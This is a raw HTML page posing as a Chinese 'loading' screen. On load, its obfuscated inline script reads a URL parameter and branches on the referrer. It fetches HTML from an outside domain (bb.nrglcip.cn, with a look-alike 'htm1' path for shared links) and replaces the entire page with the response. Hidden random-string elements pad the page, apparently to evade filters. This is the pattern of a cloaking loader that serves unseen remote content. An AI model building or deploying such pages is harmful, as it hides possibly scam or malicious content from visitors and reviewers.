<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .pMzOiabZP {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .pMzOiabZP .rvsGE3mj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .pMzOiabZP .content {
            line-height: 50px;
            text-align: center
        }

        .pMzOiabZP .img {
            width: 100%
        }

        .pMzOiabZP .lJjN8P9 {
            text-align: center
        }

        .pMzOiabZP .lJjN8P9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .pMzOiabZP .lJjN8P9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .pMzOiabZP .lJjN8P9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .pMzOiabZP .lJjN8P9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .pMzOiabZP .lJjN8P9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .pMzOiabZP .lJjN8P9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .pMzOiabZP .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zvjOkJnGk39(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gKWA4p = zvjOkJnGk39('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gKWA4p +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gKWA4p +".html?a=share";
		}
		
        jh49MUX3=url+"#"+new Date().getTime();
        jh49MUX3 && function() {
            $.get(jh49MUX3, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>F7u8e9gVjcEiRZi5NC6x1ATfCam8olrL5elGHNGJuUobW7Ci1CB8oT9GwtLy1hSykzChirAlToqSRnzIe9UFkL</span>
<img  src='' style='display:none'>
<h1 style='display:none' >Xu6nzoHtZeNUcMvd9v5UDoAo8edhoPAUcWvO4uzaWBqxT4uvftWDDAh88pcdkm3zdt</h1>
<p  style='display:none'>XLIC9V5Mob1al8AN2QkYkfJ</p>
<h1 style='display:none' >Xu6nzoHtZeNUcMvd9v5UDoAo8edhoPAUcWvO4uzaWBqxT4uvftWDDAh88pcdkm3zdt</h1><div class="pMzOiabZP">
    <div class="rvsGE3mj">
        <div class="lJjN8P9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>SK4qA0crGyTgtxdSB3gFWEv</a>
<div style='display:none'>X6sUk2sURwh6lD8ghs4jpNfxRUG72h4Zs6QR2dS9P91LqRq1fSS78T4dsb34Ux2U08Q</div>
<p  style='display:none'>aXPuivTitHZeNJ9YqeGXRurqn6qZ8P</p></body>
</html>